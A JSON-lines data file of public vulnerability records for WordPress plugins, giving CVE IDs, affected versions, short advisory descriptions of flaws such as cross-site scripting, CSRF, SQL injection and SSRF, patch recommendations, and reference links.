{"CVE_ID":"CVE-2025-1972","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d443c70-6537-4c6d-a282-12d392f0f558?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d443c70-6537-4c6d-a282-12d392f0f558?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1286","slug":"download-html-tinymce-button","versionImpact":"1.2","description":"The Download HTML TinyMCE Button WordPress plugin through 1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42556c7-09b6-49ae-9f87-cbaf16e7c280\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42556c7-09b6-49ae-9f87-cbaf16e7c280\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1400","slug":"modern-events-calendar-lite","versionImpact":"5.16.2","description":"The Modern Events Calendar Lite WordPress plugin through 5.16.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7feceef-28f1-4cac-b124-4b95e3f17b07\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7feceef-28f1-4cac-b124-4b95e3f17b07\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0831","slug":"under-construction-page","versionImpact":"3.96","description":"The Under Construction plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.96. This is due to missing or incorrect nonce validation on the dismiss_notice function called via the admin_action_ucp_dismiss_notice action. This makes it possible for unauthenticated attackers to dismiss plugin notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L901\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L901\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/031a1203-6b0d-453b-be8a-12e7f55cb401?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/031a1203-6b0d-453b-be8a-12e7f55cb401?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1570","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's login-password shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/LoginFormBuilder.php#L99\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/LoginFormBuilder.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0871","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bfef74-214f-4257-afc7-730e82e80946?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bfef74-214f-4257-afc7-730e82e80946?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032810\\\/beaver-builder-lite-version\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032810\\\/beaver-builder-lite-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2401","slug":"admin-page-spider","versionImpact":"3.20","description":"The Admin Page Spider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c33d9295-0c7f-45a0-9d62-4293c8bbef0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c33d9295-0c7f-45a0-9d62-4293c8bbef0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-page-spider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-page-spider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10014","slug":"flat-ui-button","description":"The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flat-ui-button\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flat-ui-button\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13625","slug":"tube-video-ads-lite","versionImpact":"1.5.7","description":"The Tube Video Ads Lite WordPress plugin through 1.5.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bfabf1d-86f2-4d29-bc55-d618d757dcc6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bfabf1d-86f2-4d29-bc55-d618d757dcc6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1971","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.2 via deserialization of untrusted input from the 'form_data' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b24b3d2-589f-47b2-bcdd-bebc87cafeda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b24b3d2-589f-47b2-bcdd-bebc87cafeda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1033","slug":"badgearoo","versionImpact":"1.0.14","description":"The Badgearoo WordPress plugin through 1.0.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbb63e80-92aa-4e85-9d47-dc68211af97d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbb63e80-92aa-4e85-9d47-dc68211af97d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8103","slug":"wpematico","versionImpact":"2.8.7","description":"The WPeMatico RSS Feed Fetcher plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.7. This is due to missing nonce validation in the handle_feedback_submission() function. This makes it possible for unauthenticated attackers to deactivate the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpematico\\\/tags\\\/2.8.7\\\/app\\\/plugin_functions.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpematico\\\/tags\\\/2.8.7\\\/app\\\/plugin_functions.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333908\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333908\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpematico\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpematico\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473de39-a122-4c2e-9f64-50157b589a28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473de39-a122-4c2e-9f64-50157b589a28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpematico.com\\\/releases\\\/\",\"name\":\"https:\\\/\\\/www.wpematico.com\\\/releases\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0729","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_sort_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8dbf54-ea62-4901-b34f-079b708ca0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8dbf54-ea62-4901-b34f-079b708ca0b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3418","slug":"querlo-chatbots","versionImpact":"1.2.4","description":"The Querlo Chatbot WordPress plugin through 1.2.4 does not escape or sanitize chat messages, leading to a stored Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/407edb21-8fcb-484a-babb-fce96a6aede7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/407edb21-8fcb-484a-babb-fce96a6aede7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41694","slug":"realbig-media","versionImpact":"1.0.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Realbig Team Realbig For WordPress plugin <=\u00a01.0.3 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/realbig-media\\\/wordpress-realbig-plugin-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/realbig-media\\\/wordpress-realbig-plugin-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5709","slug":"widget-twitter","versionImpact":"1.0.9","description":"The WD WidgetTwitter plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86cdbfec-b1af-48ec-ae70-f97768694e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86cdbfec-b1af-48ec-ae70-f97768694e44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-twitter\\\/trunk\\\/twitter.php?rev=2212825#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-twitter\\\/trunk\\\/twitter.php?rev=2212825#L161\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1519","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires a member listing page to be active and using the Gerbera theme.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Themes\\\/DragDrop\\\/MemberDirectory\\\/Gerbera.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Themes\\\/DragDrop\\\/MemberDirectory\\\/Gerbera.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0839","slug":"feedwordpress","versionImpact":"2022.0222","description":"The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key. This makes it possible for unauthenticated attackers to view draft posts that may contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedwordpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedwordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2349","slug":"fancy-elementor-flipbox","versionImpact":"2.4.2","description":"The Fancy Elementor Flipbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Fancy Elementor Flipbox widget in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c877ac24-a6da-4e61-a669-a0224c9e3bb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c877ac24-a6da-4e61-a669-a0224c9e3bb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-elementor-flipbox\\\/trunk\\\/widgets\\\/fancy-elementor-flipbox.php#L744\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-elementor-flipbox\\\/trunk\\\/widgets\\\/fancy-elementor-flipbox.php#L744\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5448","slug":"paypal-pay-buy-donation-and-cart-buttons-shortcode","versionImpact":"1.7","description":"The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode WordPress plugin through 1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c482fe19-b643-41ea-8194-22776b388290\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c482fe19-b643-41ea-8194-22776b388290\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9897","slug":"streamweasels-twitch-integration","versionImpact":"1.8.6","description":"The StreamWeasels Twitch Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-twitch-embed shortcode in all versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2922c85-7e16-48a1-9c43-c1a9d34571e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2922c85-7e16-48a1-9c43-c1a9d34571e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-twitch-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-twitch-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/class-streamweasels-public.php#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/class-streamweasels-public.php#L201\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171629\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171629\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13608","slug":"track-logins","versionImpact":"1.0","description":"The Track Logins WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/408e6cad-f02d-455a-9943-32da77537da1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/408e6cad-f02d-455a-9943-32da77537da1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1970","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.6.2 via the validate_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a4d7d40-8e0e-4251-8e25-3fd4ebd3a93e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a4d7d40-8e0e-4251-8e25-3fd4ebd3a93e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0688","slug":"spiritual-gifts-survey","versionImpact":"0.9.10","description":"The Spiritual Gifts Survey (and optional S.H.A.P.E survey) WordPress plugin through 0.9.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e2b77c3-ad45-4734-998a-c1722ebd1f4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e2b77c3-ad45-4734-998a-c1722ebd1f4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
